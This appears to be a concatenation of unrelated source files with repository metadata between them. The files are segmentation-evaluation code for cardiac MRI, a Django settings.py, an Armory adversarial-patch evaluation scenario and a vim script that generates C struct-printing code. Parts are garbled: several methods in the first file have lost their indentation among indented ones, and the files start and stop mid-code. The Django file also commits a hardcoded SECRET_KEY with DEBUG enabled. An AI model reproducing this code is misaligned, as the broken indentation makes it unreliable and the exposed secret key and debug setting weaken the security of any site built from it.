#binary erosion on input2
y=morphology.binary_erosion(input_2, conn)
y=y.astype(np.float32)
x=input_2.astype(np.float32)
Sprime=x-y
S=S.astype(np.bool)
Sprime=Sprime.astype(np.bool)
dta = morphology.distance_transform_edt(~S,sampling)
dtb = morphology.distance_transform_edt(~Sprime,sampling)
sds = np.concatenate([np.ravel(dta[Sprime!=0]), np.ravel(dtb[S!=0])])
return sds
def calc_pred_sf_mask(self, sess, ae, labeled_data_imgs, axis_no=2):
"""
To compute the predicted segmentation for an input stack of 2D slices
input params:
sess: current session
ae: graph name
labeled_data_imgs: input 3D volume
axis_no:
returns:
mergedlist_y_pred: predicted segmentation masks of all 2D slices
"""
total_slices = labeled_data_imgs.shape[axis_no]
for slice_no in range(total_slices):
img_test_slice = np.reshape(labeled_data_imgs[:, :, slice_no], (1, self.img_size_x, self.img_size_y, 1))
seg_pred = sess.run(ae['y_pred'], feed_dict={ae['x']: img_test_slice, ae['train_phase']: False})
# Merging predicted labels of slices(2D) of test image into one volume(3D) of predicted labels
if (slice_no == 0):
mergedlist_y_pred = np.reshape(seg_pred, (1,self.img_size_x, self.img_size_y, self.num_classes))
else:
seg_pred_final = np.reshape(seg_pred, (1,self.img_size_x, self.img_size_y, self.num_classes))
mergedlist_y_pred = np.concatenate((mergedlist_y_pred, seg_pred_final), axis=0)
return mergedlist_y_pred
    def calc_pred_sf_mask_full(self, sess, ae, labeled_data_imgs):
        '''
        To compute the predicted segmentation for an input 3D volume
        (unlike calc_pred_sf_mask, the whole volume is fed in one sess.run)
        input params:
            sess: current session
            ae: graph name (dict of graph tensors: 'x', 'y_pred', 'train_phase')
            labeled_data_imgs: input 3D volume
        returns:
            seg_pred: predicted segmentation mask of 3D volume
        '''
        test_data = labeled_data_imgs
        # train_phase=False: run the network in inference mode.
        seg_pred = sess.run(ae['y_pred'], feed_dict={ae['x']: test_data, ae['train_phase']: False})
        return seg_pred
    def reshape_img_and_f1_score(self, predicted_img_arr, gt_mask, pixel_size):
        '''
        To reshape image into the target resolution and then compute the f1 score w.r.t ground truth mask
        input params:
            predicted_img_arr: predicted segmentation mask that is computed over the re-sampled and cropped input image
            gt_mask: ground truth mask in native image resolution
            pixel_size: native image resolution
        returns:
            predictions_mask: predictions mask in native resolution (re-sampled and cropped/zeros append as per size requirements)
            f1_val: f1 score over predicted segmentation masks vs ground truth
        '''
        nx,ny= self.img_size_x,self.img_size_y
        # Scale factor mapping native pixel size to the training resolution.
        scale_vector = (pixel_size[0] / self.target_resolution[0], pixel_size[1] / self.target_resolution[1])
        # Rescale one GT slice only to learn the rescaled grid size (x, y).
        mask_rescaled = transform.rescale(gt_mask[:, :, 0], scale_vector, order=0, preserve_range=True, mode='constant')
        x, y = mask_rescaled.shape[0],mask_rescaled.shape[1]
        # Crop offsets (rescaled larger than net input) and pad offsets
        # (rescaled smaller than net input); one of each pair is negative
        # and unused per dimension.
        x_s = (x - nx) // 2
        y_s = (y - ny) // 2
        x_c = (nx - x) // 2
        y_c = (ny - y) // 2
        total_slices = predicted_img_arr.shape[0]
        predictions_mask = np.zeros((gt_mask.shape[0],gt_mask.shape[1],total_slices))
        for slice_no in range(total_slices):
            # ASSEMBLE BACK THE SLICES
            slice_predictions = np.zeros((x,y,self.num_classes))
            predicted_img=predicted_img_arr[slice_no,:,:,:]
            # insert cropped region into original image again
            if x > nx and y > ny:
                slice_predictions[x_s:x_s+nx, y_s:y_s+ny,:] = predicted_img
            else:
                if x <= nx and y > ny:
                    slice_predictions[:, y_s:y_s+ny,:] = predicted_img[x_c:x_c+ x, :,:]
                elif x > nx and y <= ny:
                    slice_predictions[x_s:x_s + nx, :,:] = predicted_img[:, y_c:y_c + y,:]
                else:
                    slice_predictions[:, :,:] = predicted_img[x_c:x_c+ x, y_c:y_c + y,:]
            # RESCALING ON THE LOGITS
            # Resize per-class scores back to native resolution, then argmax
            # to obtain the hard label map.
            prediction = transform.resize(slice_predictions,
                                          (gt_mask.shape[0], gt_mask.shape[1], self.num_classes),
                                          order=1,
                                          preserve_range=True,
                                          mode='constant')
            #print("b",prediction.shape)
            prediction = np.uint16(np.argmax(prediction, axis=-1))
            predictions_mask[:,:,slice_no]=prediction
        #Calculate F1 score
        #y_pred= predictions_mask.flatten()
        #y_true= gt_mask.flatten()
        #f1_val= f1_score(y_true, y_pred, average=None)
        f1_val = self.calc_f1_score(predictions_mask,gt_mask)
        return predictions_mask,f1_val
def calc_f1_score(self,predictions_mask,gt_mask):
'''
to compute f1/dice score
input params:
predictions_arr: predicted segmentation mask
mask: ground truth mask
returns:
f1_val: f1/dice score
'''
y_pred= predictions_mask.flatten()
y_true= gt_mask.flatten()
f1_val= f1_score(y_true, y_pred, average=None)
return f1_val
    def pred_segs_acdc_test_subjs(self, sess,ae, save_dir,orig_img_dt,test_list,struct_name,print_assd_hd_scores=0):
        '''
        To estimate the segmentation masks of test images and compute their f1 score and plot the predicted segmentations.
        input params:
            sess: current session
            ae: current model graph
            save_dir: save directory for the inference of test images
            orig_img_dt: dataloader of acdc data
            test_list: list of patient test ids
            struct_name: list of structures to segment. Here its Right ventricle (RV), myocardium (MYO), left ventricle (LV) in the heart MRI.
            print_assd_hd_scores: if 1, also compute and save ASSD and
                Hausdorff distance per structure and per subject
        returns:
            None
        '''
        count=0
        # Load each test image
        for test_id in test_list:
            test_id_l=[test_id]
            #load image,label pairs and process it to chosen resolution and dimensions
            img_sys,label_sys,pixel_size,affine_tst= orig_img_dt(test_id_l,ret_affine=1)
            cropped_img_sys,cropped_mask_sys = self.dt.preprocess_data(img_sys, label_sys, pixel_size)
            # Make directory for the test image with id number
            seg_model_dir=str(save_dir)+'pred_segs/'+str(test_id)+'/'
            pathlib.Path(seg_model_dir).mkdir(parents=True, exist_ok=True)
            # Calc dice score and predicted segmentation & store in a txt file
            pred_sf_mask = self.calc_pred_sf_mask(sess, ae, cropped_img_sys, axis_no=2)
            re_pred_mask_sys,f1_val = self.reshape_img_and_f1_score(pred_sf_mask, label_sys, pixel_size)
            #print("mean f1_val", f1_val)
            savefile_name = str(seg_model_dir)+'mean_f1_dice_coeff_test_id_'+str(test_id)+'.txt'
            np.savetxt(savefile_name, f1_val, fmt='%s')
            # Save the segmentation in nrrd files & plot some sample images
            self.plot_predicted_seg_ss(img_sys,label_sys,re_pred_mask_sys,seg_model_dir,test_id)
            #save the nifti segmentation file
            array_img = nib.Nifti1Image(re_pred_mask_sys.astype(np.int16), affine_tst)
            pred_filename = str(seg_model_dir)+'pred_seg_id_'+str(test_id)+'.nii.gz'
            nib.save(array_img, pred_filename)
            # Keep only foreground classes (index 0 is background).
            dsc_tmp=np.reshape(f1_val[1:self.num_classes], (1, self.num_classes - 1))
            if(print_assd_hd_scores==1):
                # Average symmetric surface distance (ASSD) and Hausdorff
                # distance (HD) per foreground structure.
                assd_list=[]
                hd_list=[]
                for index in range(1,self.num_classes):
                    surface_distance = self.surfd((re_pred_mask_sys==index), (label_sys==index))
                    msd = surface_distance.mean()
                    hd=surface_distance.max()
                    assd_list.append(msd)
                    hd_list.append(hd)
                filename_msd=str(seg_model_dir)+'assd_test_id_'+str(test_id)+'.txt'
                filename_hd=str(seg_model_dir)+'hd_test_id_'+str(test_id)+'.txt'
                np.savetxt(filename_msd,assd_list,fmt='%s')
                np.savetxt(filename_hd,hd_list,fmt='%s')
                assd_tmp=np.reshape(np.asarray(assd_list),(1,self.num_classes-1))
                hd_tmp=np.reshape(np.asarray(hd_list),(1,self.num_classes-1))
            # Accumulate per-subject rows into (subjects, classes-1) arrays.
            if(count==0):
                dsc_all=dsc_tmp
                if(print_assd_hd_scores==1):
                    assd_all=assd_tmp
                    hd_all=hd_tmp
                count=1
            else:
                dsc_all=np.concatenate((dsc_all, dsc_tmp))
                if(print_assd_hd_scores==1):
                    assd_all=np.concatenate((assd_all, assd_tmp))
                    hd_all=np.concatenate((hd_all, hd_tmp))
        #for DSC
        # Aggregate DSC across all subjects: per-structure median/std/mean.
        val_list=[]
        val_list_mean=[]
        for i in range(0,self.num_classes-1):
            dsc=dsc_all[:,i]
            #DSC
            #val_list.append(round(np.mean(dsc), 3))
            val_list.append(round(np.median(dsc), 3))
            val_list.append(round(np.std(dsc), 3))
            val_list_mean.append(round(np.mean(dsc), 3))
            filename_save=str(save_dir)+'pred_segs/'+str(struct_name[i])+'_20subjs_dsc.txt'
            np.savetxt(filename_save,dsc,fmt='%s')
        filename_save=str(save_dir)+'pred_segs/'+'median_std_dsc.txt'
        np.savetxt(filename_save,val_list,fmt='%s')
        filename_save=str(save_dir)+'pred_segs/'+'mean_dsc.txt'
        np.savetxt(filename_save,val_list_mean,fmt='%s')
        #filename_save=str(save_dir)+'pred_segs/'+'net_dsc_mean.txt'
        #net_mean_dsc=[]
        #net_mean_dsc.append(round(np.mean(val_list_mean),3))
        #np.savetxt(filename_save,net_mean_dsc,fmt='%s')
        if(print_assd_hd_scores==1):
            # Aggregate ASSD and HD across all subjects, same layout as DSC.
            #for ASSD
            val_list=[]
            val_list_mean=[]
            #for HD
            hd_val_list=[]
            hd_val_list_mean=[]
            for i in range(0,self.num_classes-1):
                assd=assd_all[:,i]
                hd=hd_all[:,i]
                #ASSD
                #val_list.append(round(np.mean(assd), 3))
                val_list.append(round(np.median(assd), 3))
                val_list.append(round(np.std(assd), 3))
                val_list_mean.append(round(np.mean(assd), 3))
                filename_save=str(save_dir)+'pred_segs/'+str(struct_name[i])+'_20subjs_assd.txt'
                np.savetxt(filename_save,assd,fmt='%s')
                #HD
                #hd_val_list.append(round(np.mean(hd), 3))
                hd_val_list.append(round(np.median(hd), 3))
                hd_val_list.append(round(np.std(hd), 3))
                hd_val_list_mean.append(round(np.mean(hd), 3))
                filename_save=str(save_dir)+'pred_segs/'+str(struct_name[i])+'_20subjs_hd.txt'
                np.savetxt(filename_save,hd,fmt='%s')
            filename_save=str(save_dir)+'pred_segs/'+'median_std_assd.txt'
            np.savetxt(filename_save,val_list,fmt='%s')
            filename_save=str(save_dir)+'pred_segs/'+'assd_mean.txt'
            np.savetxt(filename_save,val_list_mean,fmt='%s')
            filename_save=str(save_dir)+'pred_segs/'+'median_std_hd.txt'
            np.savetxt(filename_save,hd_val_list,fmt='%s')
            filename_save=str(save_dir)+'pred_segs/'+'hd_mean.txt'
            np.savetxt(filename_save,hd_val_list_mean,fmt='%s')
    def plot_predicted_seg_ss(self, test_data_img,test_data_labels,predicted_labels,save_dir,test_id):
        '''
        To plot the original image, ground truth mask and predicted mask
        input params:
            test_data_img: test image to be plotted
            test_data_labels: test image GT mask to be plotted
            predicted_labels: predicted mask of the test image
            save_dir: directory where to save the plot
            test_id: patient id number of the dataset
        returns:
            None
        '''
        # Show 3 sample slices (every 2nd slice) in a 3-row grid:
        # image / GT mask / predicted mask.
        n_examples=3
        fig, axs = plt.subplots(3, n_examples, figsize=(10, 10))
        fig.suptitle('Predicted Seg',fontsize=10)
        for example_i in range(n_examples):
            if(example_i==0):
                axs[0][0].set_title('test image')
                axs[1][0].set_title('ground truth mask')
                axs[2][0].set_title('predicted mask')
            axs[0][example_i].imshow(test_data_img[:,:,example_i*2],cmap='gray')
            axs[1][example_i].imshow(test_data_labels[:,:,example_i*2])
            axs[2][example_i].imshow(np.squeeze(predicted_labels[:,:,example_i*2]))
            axs[0][example_i].axis('off')
            axs[1][example_i].axis('off')
            axs[2][example_i].axis('off')
        savefile_name=str(save_dir)+'tst'+str(test_id)+'_predicted_segmentation_masks.png'
        fig.savefig(savefile_name)
        plt.close('all')
    def plot_deformed_imgs(self,ld_img_batch,y_geo_deformed,flow_vec,save_dir,index):
        '''
        To plot the different deformation fields generated from different z's sampled.
        These deformation fields are applied on a single image to illustrate different augmented images that can be generated from a single image.
        input params:
            ld_img_batch: input labeled image
            y_geo_deformed: deformed images (non-affine spatial transformation applied)
            flow_vec: deformation fields
            save_dir: base directory under which a 'plots/' folder is created
            index: integer tag appended to the saved png filename
        returns:
            None
        '''
        save_dir_tmp=str(save_dir)+'/plots/'
        pathlib.Path(save_dir_tmp).mkdir(parents=True, exist_ok=True)
        savefile_name_tmp=str(save_dir_tmp)+'deformed_imgs_for_different_z_sampled_for_'
        # Plot the first max_val batch entries side by side.
        max_val=5
        step_update=1
        #def for quiver plot
        X, Y = np.meshgrid(np.arange(0, self.img_size_x, 1), np.arange(0, self.img_size_y, 1))
        #every 10th arrow to plot
        t=10
        plt.figure(figsize=(18,6))
        plt.suptitle('orig vs deformed imgs')
        for i in range(0,max_val,step_update):
            train_slice=np.squeeze(ld_img_batch[i,:,:,0])
            y_deformed_slice=np.squeeze(y_geo_deformed[i,:,:,0])
            v_x=np.squeeze(flow_vec[i,:,:,0])
            v_y=np.squeeze(flow_vec[i,:,:,1])
            if(i==0):
                plt.subplot(2, max_val+1, 1)
                plt.title('orig img')
                plt.imshow(train_slice,cmap='gray')
                plt.axis('off')
            # Top row: deformation field overlaid on the original image.
            plt.subplot(2, max_val+1, i+2)
            if(i==0):
                plt.title('deformation field over imgs -->')
            plt.imshow(train_slice,cmap='gray')
            plt.quiver(X[::t, ::t], Y[::t, ::t], v_x[::t, ::t], v_y[::t, ::t], pivot='mid', units='inches',color='yellow')
            plt.axis('off')
            # Bottom row: the resulting deformed image.
            plt.subplot(2, max_val+1, max_val+1+i+2)
            if(i==0):
                plt.title('deformed imgs -->')
            plt.imshow(y_deformed_slice,cmap='gray')
            plt.axis('off')
        savefile_name=str(savefile_name_tmp)+'i_'+str(index)+'.png'
        plt.savefig(savefile_name)
        plt.close('all')
    def plot_intensity_transformed_imgs(self,ld_img_batch,y_int_deformed,int_vec,save_dir,index):
        '''
        To plot the different intensity fields generated from different z's sampled.
        These intensity fields are applied on a single image to illustrate different augmented images that can be generated from a single image.
        input params:
            ld_img_batch: input labeled image
            y_int_deformed: intensity transformed images
            int_vec: intensity fields
            save_dir: base directory under which a 'plots/' folder is created
            index: integer tag appended to the saved png filename
        returns:
            None
        '''
        save_dir_tmp=str(save_dir)+'/plots/'
        pathlib.Path(save_dir_tmp).mkdir(parents=True, exist_ok=True)
        savefile_name_tmp=str(save_dir_tmp)+'intensity_transformed_imgs_for_different_z_sampled_for_'
        # Plot the first max_val batch entries side by side.
        max_val=5
        step_update=1
        plt.figure(figsize=(18,6))
        plt.suptitle('orig vs intensity transformed imgs')
        for i in range(0,max_val,step_update):
            train_slice=np.squeeze(ld_img_batch[i,:,:,0])
            y_deformed_slice=np.squeeze(y_int_deformed[i,:,:,0])
            int_slice=np.squeeze(int_vec[i,:,:,0])
            if(i==0):
                plt.subplot(2, max_val+1, 1)
                plt.title('orig img')
                plt.imshow(train_slice,cmap='gray')
                plt.axis('off')
            # Top row: the sampled intensity field.
            plt.subplot(2, max_val+1, i+2)
            if(i==0):
                plt.title('intensity fields -->')
            plt.imshow(int_slice,cmap='gray')
            plt.axis('off')
            # Bottom row: the intensity-transformed image.
            plt.subplot(2, max_val+1, max_val+1+i+2)
            if(i==0):
                plt.title('intensity transformed imgs -->')
            plt.imshow(y_deformed_slice,cmap='gray')
            plt.axis('off')
        savefile_name=str(savefile_name_tmp)+'i_'+str(index)+'.png'
        plt.savefig(savefile_name)
        plt.close('all')
def write_gif_func(self, ip_img, imsize, save_dir,index=0):
'''
To save a gif of the input stack of 2D slices
input params:
ip_img: input stack of 2D slices
imsize: image dimensions
save_dir:directory to save the gif
returns:
None
'''
y = np.squeeze(ip_img)
y_t=np.transpose(y)
recons_ims = np.reshape(y_t,(self.img_size_x*self.img_size_y,self.batch_size))
dataset =np.transpose(recons_ims.reshape(1,imsize[0],imsize[1],recons_ims.shape[1]),[3,0,1,2])
np.expand_dims(dataset, axis=1)
dataset = np.tile(dataset, [1,3,1,1])
imname=save_dir+'plots/test_slice_index_'+str(index)+'.gif'
write_gif((dataset*256).astype(np.uint8), imname, fps=5)
|
[
"LucienSwetschinski@gmail.com"
] |
LucienSwetschinski@gmail.com
|
c4d77d1c78321871c1ca9fb5d7f87495dac2e3e6
|
a4890feb7504837210f8b187f14499382789c2e9
|
/Week 8/Django/mysite/settings.py
|
f4f846ed946e49189768bc05a9dfc964bc5ed798
|
[] |
no_license
|
ExaltedA/Web
|
9cc898d5b85ee0a634958eba0097034ae9bcbce0
|
869a0fe17dbfea023b0bb326367a2472914f51ea
|
refs/heads/master
| 2021-08-09T14:00:23.307171
| 2020-09-11T16:47:54
| 2020-09-11T16:47:54
| 239,846,939
| 0
| 0
| null | 2021-07-14T11:52:23
| 2020-02-11T19:30:31
| null |
UTF-8
|
Python
| false
| false
| 3,190
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.11.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control; it should be rotated
# and loaded from the environment before any production deployment.
SECRET_KEY = '6y5*gr&#rd#)fbs8tv$g%@1sbh!zts=x2o*1o#acjkuwm@9ml@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Local development plus any pythonanywhere.com subdomain.
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog',  # project-local application
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,  # look for templates inside each app's templates/ dir
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# Default: a local SQLite file next to the project.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'Asia/Almaty'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR,'static')
|
[
"aldie1741@gmail.com"
] |
aldie1741@gmail.com
|
999d447baa7c7fb35500a3e889ad6dcca56dec97
|
2c991e1eb2e81783081e0d788c3ce56205395fe3
|
/armory/scenarios/dapricot_scenario.py
|
3b4b93ab4909a031d48c984af56441b0bfef2c9f
|
[
"MIT"
] |
permissive
|
yusong-tan/armory
|
b086d31a2a2c632766d0e93c7e8483ae2b007826
|
388edde7d85f96dac6a96c13854b955f1bb5c3c3
|
refs/heads/master
| 2023-08-11T05:08:07.126434
| 2022-01-26T18:49:26
| 2022-01-26T18:49:26
| 247,883,491
| 0
| 0
|
MIT
| 2020-03-17T05:02:57
| 2020-03-17T05:02:57
| null |
UTF-8
|
Python
| false
| false
| 5,317
|
py
|
"""
D-APRICOT scenario for object detection in the presence of targeted adversarial patches.
"""
import copy
import logging
from armory.scenarios.scenario import Scenario
from armory.utils import metrics
logger = logging.getLogger(__name__)
class ObjectDetectionTask(Scenario):
    """D-APRICOT object-detection scenario: targeted adversarial patches only.

    The scenario has no benign evaluation and no training; the overrides below
    either validate the config against the D-APRICOT threat model or disable
    unsupported base-class code paths.
    """

    def __init__(self, *args, skip_benign=None, **kwargs):
        """Force skip_benign=True and reject flags incompatible with D-APRICOT."""
        # skip_benign is accepted only so the CLI flag doesn't error; the
        # scenario always skips benign evaluation regardless.
        if skip_benign is False:
            logger.warning(
                "--skip-benign=False is being ignored since the D-APRICOT"
                " scenario doesn't include benign evaluation."
            )
        super().__init__(*args, skip_benign=True, **kwargs)
        # These base-class options make no sense for an attack-only scenario.
        if self.skip_misclassified:
            raise ValueError(
                "skip_misclassified shouldn't be set for D-APRICOT scenario"
            )
        if self.skip_attack:
            raise ValueError("--skip-attack should not be set for D-APRICOT scenario.")

    def load_attack(self):
        """Validate the attack config (targeted, non-preloaded, threat model set), then delegate."""
        attack_config = self.config["attack"]
        attack_type = attack_config.get("type")
        # The D-APRICOT threat model is targeted by definition.
        if not attack_config.get("kwargs").get("targeted", False):
            raise ValueError(
                "attack['kwargs']['targeted'] must be set to True for D-APRICOT scenario"
            )
        elif attack_type == "preloaded":
            raise ValueError(
                "attack['type'] should not be set to 'preloaded' for D-APRICOT scenario "
                "and does not need to be specified."
            )
        elif "targeted_labels" not in attack_config:
            raise ValueError(
                "attack['targeted_labels'] must be specified, as the D-APRICOT"
                " threat model is targeted."
            )
        elif attack_config.get("use_label"):
            raise ValueError(
                "The D-APRICOT scenario threat model is targeted, and"
                " thus attack['use_label'] should be set to false or unspecified."
            )
        # threat_model must be present and one of the two supported values.
        generate_kwargs = attack_config.get("generate_kwargs", {})
        if "threat_model" not in generate_kwargs:
            raise ValueError(
                "D-APRICOT scenario requires attack['generate_kwargs']['threat_model'] to be set to"
                " one of ('physical', 'digital')"
            )
        elif generate_kwargs["threat_model"].lower() not in ("physical", "digital"):
            raise ValueError(
                "D-APRICOT scenario requires attack['generate_kwargs']['threat_model'] to be set to"
                f"' one of ('physical', 'digital'), not {generate_kwargs['threat_model']}."
            )
        super().load_attack()

    def load_dataset(self):
        """Require batch_size == 1 (the scenario unpacks a single multi-camera sample)."""
        if self.config["dataset"].get("batch_size") != 1:
            raise ValueError(
                "dataset['batch_size'] must be set to 1 for D-APRICOT scenario."
            )
        super().load_dataset()

    def load_model(self, defended=True):
        """Warn when the physical threat model is used with a model batch size other than 3."""
        model_config = self.config["model"]
        generate_kwargs = self.config["attack"]["generate_kwargs"]
        # The physical attack feeds 3 camera views per sample; warn (don't
        # fail) since non-baseline models may handle batching differently.
        if (
            model_config["model_kwargs"].get("batch_size") != 3
            and generate_kwargs["threat_model"].lower() == "physical"
        ):
            logger.warning(
                "If using Armory's baseline mscoco frcnn model,"
                " model['model_kwargs']['batch_size'] should be set to 3 for physical attack."
            )
        super().load_model(defended=defended)

    def fit(self, train_split_default="train"):
        """Training is unsupported for this scenario."""
        raise NotImplementedError(
            "Training has not yet been implemented for object detectors"
        )

    def load_metrics(self):
        """Load metrics, then drop non-targeted adversarial tasks (none apply here)."""
        super().load_metrics()
        # The D-APRICOT scenario has no non-targeted tasks
        self.metrics_logger.adversarial_tasks = []

    def run_benign(self):
        """Benign evaluation is not part of D-APRICOT."""
        raise NotImplementedError("D-APRICOT has no benign task")

    def run_attack(self):
        """Generate the targeted patch attack for one sample and record metrics.

        Expects self.x with shape (1, num_cameras, h, w, c) and self.y as a
        (y_object, y_patch_metadata) pair; stores x_adv, y_target, y_pred_adv
        on self for downstream export/metrics.
        """
        x, y = self.x, self.y
        with metrics.resource_context(name="Attack", **self.profiler_kwargs):
            if x.shape[0] != 1:
                raise ValueError("D-APRICOT batch size must be set to 1")
            # (nb=1, num_cameras, h, w, c) --> (num_cameras, h, w, c)
            x = x[0]
            y_object, y_patch_metadata = y
            # Deep-copy so per-sample keys don't leak into shared kwargs.
            generate_kwargs = copy.deepcopy(self.generate_kwargs)
            generate_kwargs["y_patch_metadata"] = y_patch_metadata
            y_target = self.label_targeter.generate(y_object)
            generate_kwargs["y_object"] = y_target
            x_adv = self.attack.generate(x=x, **generate_kwargs)
        # Ensure that input sample isn't overwritten by model
        x_adv.flags.writeable = False
        y_pred_adv = self.model.predict(x_adv)
        # Score each camera view against its targeted labels.
        for img_idx in range(len(y_object)):
            y_i_target = y_target[img_idx]
            y_i_pred = y_pred_adv[img_idx]
            self.metrics_logger.update_task(
                [y_i_target], [y_i_pred], adversarial=True, targeted=True
            )
        self.metrics_logger.update_perturbation(x, x_adv)
        if self.sample_exporter is not None:
            self.sample_exporter.export(x, x_adv, y_object, y_pred_adv)
        self.x_adv, self.y_target, self.y_pred_adv = x_adv, y_target, y_pred_adv

    def finalize_results(self):
        """Log the targeted adversarial task results and cache them on self."""
        self.metrics_logger.log_task(adversarial=True, targeted=True)
        self.results = self.metrics_logger.results()
|
[
"noreply@github.com"
] |
yusong-tan.noreply@github.com
|
e5e814d1049d7599a0c0d9f091966876fda523d5
|
c40030f09958f8d85530e7e6044df926169b48fd
|
/autoload/GenerateShowStructFunction.py
|
188aef1ce22ecd7e3ce3be2b07a0801cc8b21521
|
[
"MIT"
] |
permissive
|
AtsushiSakai/comfortablecpp.vim
|
3232d736a1d3ca09fe4302029b2d887adf7b454f
|
6755133ee52dc21a64eb56ad09db6aa6c91440be
|
refs/heads/master
| 2016-09-16T02:22:53.702201
| 2015-07-31T13:48:38
| 2015-07-31T13:48:38
| 39,666,019
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,317
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
def GenerateShowStructFunction(structstr, separater="\\n"):
    """Generate C source lines for a function printing every struct member.

    input params:
        structstr: C struct declaration text, e.g. "struct S{int a;};"
        separater: text appended after each member inside the generated
            format string (default is a literal "\n" escape in the emitted C)
    returns:
        list of C source lines defining Show<Name>struct(const <Name> &obj)
    """
    structname, memberlist = GenerateStructMetaData(structstr)
    showCode = []
    showCode.append("void Show" + structname + "struct(const " + structname + " &obj){")
    # NOTE(review): this emits printf("__func__"); which prints the literal
    # text "__func__", not the enclosing function's name -- presumably
    # printf(__func__) was intended; kept as-is pending confirmation.
    showCode.append('\tprintf("__func__");')
    for member in memberlist:
        typename = member[0]
        code = '\tprintf("'
        code += member[1] + ":%"
        code += GetValueFormat(typename)
        # Bug fix: the original emitted printf("name:%fmt\n"); with a
        # conversion specifier but NO matching argument, which is undefined
        # behavior in C. Pass the member value explicitly.
        code += separater + '", obj.' + member[1] + ');'
        showCode.append(code)
    showCode.append('}')
    return showCode
def GetValueFormat(typename):
    """Map a C type name to a printf conversion specifier (without the '%').

    Matching is substring-based, so specific names (uint16, uint32, ...) must
    be tested before the generic "int"/"short" fallthrough. Returns "UNKNOWN"
    for unrecognized types.
    """
    # Bug fixes vs. the original:
    #  * `find("uint16")!=-1 and find("uint8")!=-1` (and the int16/int8 twin)
    #    can never both hold for one type name -- changed to `or`.
    #  * the generic `short or int` branch ran before the uint32/int32
    #    branches and shadowed them (e.g. "uint32" wrongly got "d") --
    #    specific checks are now ordered before generic ones.
    valueformat = ""
    if typename.find("float") != -1:
        valueformat = "f"
    elif typename.find("double") != -1:
        valueformat = "lf"
    elif typename.find("char") != -1 and typename.find("*") != -1:
        valueformat = "s"
    elif typename.find("char") != -1:
        valueformat = "c"
    elif typename.find("uint16") != -1 or typename.find("uint8") != -1:
        valueformat = "u"
    elif typename.find("uint32") != -1:
        valueformat = "lu"
    elif typename.find("unsigned") != -1 and typename.find("long") != -1:
        valueformat = "lu"
    elif typename.find("unsigned") != -1 and typename.find("int") != -1:
        valueformat = "u"
    elif typename.find("unsigned") != -1 and typename.find("short") != -1:
        valueformat = "u"
    elif typename.find("int16") != -1 or typename.find("int8") != -1:
        valueformat = "d"
    elif typename.find("long") != -1 or typename.find("int32") != -1:
        valueformat = "ld"
    elif typename.find("short") != -1 or typename.find("int") != -1:
        valueformat = "d"
    else:
        valueformat = "UNKNOWN"
    return valueformat
def GenerateStructMetaData(structstr):
    """Parse a C struct declaration into (struct name, member list).

    input params:
        structstr: text of the form "struct Name{type member; ...};"
    returns:
        (structname, memberlist) where memberlist is a list of
        (typename, membername) tuples; returns "" when the text does not
        start with the "struct" keyword.
    """
    # The first token (up to the first space) must be the "struct" keyword.
    headerind = structstr.find(" ")
    header = structstr[0:headerind]
    if header != "struct":
        # Bug fix: `print "..."` is Python 2-only syntax; the parenthesized
        # form behaves identically on both Python 2 and Python 3.
        print("Unknown header:" + header)
        # NOTE(review): callers unpack two values, so this bare "" return
        # raises at the call site -- TODO confirm the intended error path.
        return ""
    body = structstr[headerind + 1:]
    # Struct name is everything before the opening brace.
    structnameind = body.find("{")
    structname = body[0:structnameind]
    structname = structname.strip()
    # Member declarations live between the first "{" and the last "}".
    contentind = body.rfind("}")
    content = body[structnameind + 1:contentind]
    # Split declarations on ";" and drop empty / whitespace-only entries.
    members = content.split(";")
    while members.count("") > 0:
        members.remove("")
    while members.count("\n") > 0:
        members.remove("\n")
    # The last space in each declaration separates the type from the name,
    # so multi-word types ("unsigned long") stay intact.
    memberlist = []
    for member in members:
        valueid = member.rfind(" ")
        typename = member[0:valueid]
